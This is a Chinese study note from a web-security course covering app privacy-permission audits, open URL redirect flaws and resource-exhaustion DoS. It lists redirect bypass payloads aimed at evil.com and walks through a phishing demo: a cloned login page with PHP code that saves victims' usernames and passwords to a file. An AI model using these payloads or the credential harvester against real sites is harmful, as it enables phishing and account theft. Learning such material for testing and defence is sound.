当前位置: 首页 > news >正文

小迪安全v2023学习笔记(七十七讲)—— 业务设计篇隐私合规检测重定向漏洞资源拒绝服务

文章目录

  • 前记
  • WEB攻防——第七十七天
    • 业务设计篇&隐私合规检测&URL重定向&资源拒绝服务&配合项目
      • 隐私合规 - 判断规则&检测项目
        • 介绍
        • 案例演示
      • URL重定向 - 检测判断&钓鱼配合
        • 介绍
        • 黑盒测试
          • 看业务功能
          • 看参数名
          • goole语法搜索
        • 白盒测试
        • 跳转URL绕过思路
        • 钓鱼配合
      • 资源拒绝服务 - 加载受控&处理受控
        • 加载受控
        • 处理受控

前记

  • 今天是学习小迪安全的第七十七天,本节课是WEB攻防的最后一讲,主要是业务设计方面的内容,包括隐私合规重定向漏洞以及资源拒绝服务漏洞
  • 主要是以理解思路为主,但是这些漏洞可能很多都不收或者风险比较大

WEB攻防——第七十七天

业务设计篇&隐私合规检测&URL重定向&资源拒绝服务&配合项目

隐私合规 - 判断规则&检测项目

介绍
  • 检测对象:APP、小程序等
  • 检测内容:主要是看其有没有未经用户同意调用一些涉及隐私的权限,比如位置信息、录音、联系人信息、相机等等
  • 检测项目
    1. appscan
      • 动态分析,更推荐
      • 但缺点是需要真机,并且需要root权限及打开ADB调试
    2. appshark
      • 静态分析
    3. MobSF
      • 之前课程里讲过的APP逆向分析工具,也可以用来分析合规权限
      • 静态分析,需要自己手动检验是否真实存在
      • 搭建比较麻烦,但是有在线网站,或者使用f8x项目自动化搭建
案例演示
  • 这里因为我也没有真机,所以只能通过MobSF去静态分析一个APK文件,简单看一下效果

  • 比如我们在网上随便下载一个安卓应用:
    在这里插入图片描述

  • 然后直接将它拖到我们的MobSF上,等待它的分析结果:
    在这里插入图片描述

  • 等待一段时间之后它就会自动生成一份报告,然后我们选中Permission这栏就可以看到当前APK中所调用的权限:
    在这里插入图片描述

  • 但这里他只是提供了可能涉及到哪些隐私安全,实际还是要自己手动打开软件测一测有没有得到用户的授权,需要根据它实际的功能想到可能调用的权限

URL重定向 - 检测判断&钓鱼配合

介绍
  • URL 重定向漏洞(URL redirection vulnerability),是一种常见的 Web 安全漏洞,由于网站 URL 重定向功能设计不当,没有验证跳转的目标 URL 是否合法,用户可通过此漏洞跳转到任意网站,这会导致可通过该网站跳转到存在木马、病毒的网站或者钓鱼网站,国外大厂的一个任意 URL 跳转都 500$1000$ 了,国内看运气~
  • 不知道各位是否还记得在SSRF那节课中做过的一道CTF题,解题方法就是通过正常的URL重定向到内网地址;其实是同样的道理,只不过这里是跳转到一个恶意的钓鱼网站,比如诱导用户输入自己的账号密码和其他身份信息等
黑盒测试
看业务功能
  • 用户登录、统一身份认证处,认证完后会跳转(跳转登录
  • 用户分享、收藏内容过后,会跳转(分享跳转
  • 跨站点认证、授权后,会跳转(认证跳转
  • 站内点击其它网址链接时,会跳转(站内跳转
看参数名
  • redirectredirect_toredirect_urlurl
  • jumpjump_to
  • target
  • to
  • linklinkto
  • domain
goole语法搜索
site:xxx.xxx inurl:?url=
白盒测试
  • 白盒测试主要看代码怎么写的
  • Java
response.sendRedirect(request.getParameter("url"))
  • PHP
+ $redirect_url = $_GET['url'];
+ header("Location: " . $redirect_url)
  • .NET
+ string redirect_url = request.QueryString["url"];
+ Response.Redirect(redirect_url);
  • Django
+ redirect_url = request.GET.get("url")
+ HttpResponseRedirect(redirect_url)
  • Flask
+ redirect_url = request.form['url']
+ redirect(redirect_url)
  • Rails
redirect_to params[:url]
跳转URL绕过思路
  • 单斜线“/”绕过
https://www.landgrey.me/redirect.php?url=/www.evil.com
  • 缺少协议绕过
https://www.landgrey.me/redirect.php?url=//www.evil.com
  • 多斜线“/”前缀绕过
https://www.landgrey.me/redirect.php?url=///www.evil.com https://www.landgrey.me/redirect.php?url=www.evil.com
  • 利用反斜线“\”绕过
https://www.landgrey.me/redirect.php?url=https://www.evil.com\www.landgrey.me
  • 利用“#”符号绕过
https://www.landgrey.me/redirect.php?url=https://www.evil.com#www.landgrey.me
  • 利用“?”符号绕过
https://www.landgrey.me/redirect.php?url=https://www.evil.com?www.landgrey.me
  • 利用“\”符号绕过
https://www.landgrey.me/redirect.php?url=https://www.evil.com\\www.landgrey.me
  • 利用“.”符号绕过
https://www.landgrey.me/redirect.php?url=.evil           
(可能会跳转到www.landgrey.me.evil域名) 
https://www.landgrey.me/redirect.php?url=.evil.com       
(可能会跳转到evil.com域名)
  • 重复特殊字符绕过
https://www.landgrey.me/redirect.php?url=///www.evil.com//.. 
https://www.landgrey.me/redirect.php?url=www.evil.com//..
钓鱼配合
  • 我们使用的钓鱼网页制作软件为Teleport Ultra,然后以下所有的网页都放到公网,以便Teleport Ultra能够正常爬取
  • 小迪的那个演示网站已经用不了了,需要登录,然后我们这里就自己随便写个网站test.php,接收url参数,然后跳转网页:
<?php  
$url = $_GET['url'] ?? 'http://[域名]:8081/admin/token/login_token.php';  
?>  <!doctype html>  
<title>跳转中</title>  
<h1>稍等,正在跳转...</h1>  
<meta http-equiv="refresh" content="2;url=<?php echo $url;?>">
  • 正常来说访问该网页,他会跳转到登录页面:
    在这里插入图片描述

  • 但是这里如果我们尝试让他跳转到https://www.baidu.com,它也是能够正常跳转的,那就说明它可能存在这种重定向漏洞:
    在这里插入图片描述
    在这里插入图片描述

  • 然后我们到它原本的跳转页面去,复制这个网站,然后使用这个软件爬取一份相同的网页:
    在这里插入图片描述

  • 他就自动帮我们爬取了上面的所有前端页面内容,然后我们可以自己看一看几乎是一模一样的:
    在这里插入图片描述

  • 我们这里修改里面的内容,比如将用户输入的登录密码保存到当前路径下的某个文件里:

<?php  $u = $_POST['username'];  $p = $_POST['password'];  $f = fopen('pass.txt', 'a+');  fwrite($f, $u . "|" . $p . "\n");  fclose($f);  
?>
  • 然后就将修改完成的钓鱼网页放到自己的服务器上,再让这个网页跳转到钓鱼网页即可,这样就得到了一个恶意链接http://blog.xxx.cn:8080/test.php?url=http://[自己的域名]/login_token.php

  • 最后当别人访问这个链接的时候,会以为是正常的网页,然后输入自己的账号和密码,我们本地的服务器就会创建一个文件记录:
    在这里插入图片描述

  • 但是这个漏洞国内很多都不收,主要是因为他要配合钓鱼使用,中招率不高

资源拒绝服务 - 加载受控&处理受控

加载受控
  • 某些网站可以加载一张图片,如果我们能够控制该图片的大小,比如长和宽的话,假设将这个大小设置为很大很大,将服务器的CPU拉满,以此来达到拒绝服务的目的
处理受控
  • 某些网站可以上传压缩包或者其他的东西,然后它自动解压,那我们如果上传一个压缩包炸弹(压缩包无限套压缩包),这样就会导致上传大小很小,但是实际资源大小很大,以此来拉满服务器的CPU占用,达到拒绝服务的目的

  • 但是这两个都不怎么常用,因为这个东西搞不好会让网站服务器崩溃,容易金橘子,所以我这里也不做案例演示了


文章转载自:

http://tpGxUbgj.skcgh.cn
http://YF0LGjUI.skcgh.cn
http://8d31Xr1R.skcgh.cn
http://wrwASdBK.skcgh.cn
http://RLDC2IMr.skcgh.cn
http://6bc8ztBe.skcgh.cn
http://xRYc0GAn.skcgh.cn
http://eZUpz5hh.skcgh.cn
http://XglnOB30.skcgh.cn
http://dy5JQf11.skcgh.cn
http://6IWuBlcc.skcgh.cn
http://Uuqy19W2.skcgh.cn
http://yvxy4ey1.skcgh.cn
http://QY6vKM06.skcgh.cn
http://KnMq8w90.skcgh.cn
http://T6HVpiZl.skcgh.cn
http://vtmnot8d.skcgh.cn
http://3Q8v7XOl.skcgh.cn
http://pKnm87Jj.skcgh.cn
http://P1gIiXUX.skcgh.cn
http://obpjy8M5.skcgh.cn
http://sQ13CT0S.skcgh.cn
http://4E4RZSpR.skcgh.cn
http://HPVs9zyU.skcgh.cn
http://xsYWulua.skcgh.cn
http://SSzSs1FE.skcgh.cn
http://N7W0nkEg.skcgh.cn
http://o4QjZFU6.skcgh.cn
http://K0OVS3Ls.skcgh.cn
http://ivXoy08H.skcgh.cn
http://www.dtcms.com/a/366113.html

相关文章:

  • 【RNN-LSTM-GRU】第四篇 GRU门控循环单元:LSTM的高效替代者与实战指南
  • 为何三折叠手机只有华为可以?看华为Mate XTs非凡大师就知道
  • 2025年09月03日最热门的开源项目(Github)
  • Redis底层实现原理之五大基础结构
  • 云手机与网络游戏相结合的优势?
  • Docker学习笔记(二):镜像与容器管理
  • 20. 云计算-华为云-云服务
  • 域名注册后,为什么还需要域名解析?
  • 嵌入式硬件 - 51单片机3
  • 操作系统(二) :进程与线程
  • 力扣14:最长公共前缀
  • 【面试题】生成式搜索能否保证top-1的准确性?
  • C++类和对象(上):从设计图到摩天大楼的构建艺术
  • 从战略亏损到万亿估值:新“股王”寒武纪如何改写中国芯片叙事?
  • Sentinel 与 Feign 整合详解:实现服务调用的流量防护
  • solar应急响应-7月
  • 遥感语义分割辅导
  • 基于Hadoop的网约车公司数据分析系统设计(代码+数据库+LW)
  • 【序列晋升】28 云原生时代的消息驱动架构 Spring Cloud Stream的未来可能性
  • Vue3+TS 交互式三层关系图
  • HDFS机架感知、副本存放机制详解(附源码地址)
  • Deathnote: 1靶场渗透
  • 2025企业ODI备案全指南:五大出海场景解析与合规路径,中国卖家如何破局全球市场?
  • 飞算JavaAI开发在线图书借阅平台全记录:从0到1的实践指南
  • 用Logseq与cpolar:构建开源笔记的分布式协作系统
  • 【文件快速搜索神器Everything】实用工具强推——文件快速搜索神器Everything详细图文下载安装教程 办公学习必备软件
  • git命令常用指南
  • Java 和 Python 的执行方式有很大不同——Android学习
  • 编程与数学 03-004 数据库系统概论 19_数据库的分布式查询
  • 【C++】详解形参和实参:别再傻傻分不清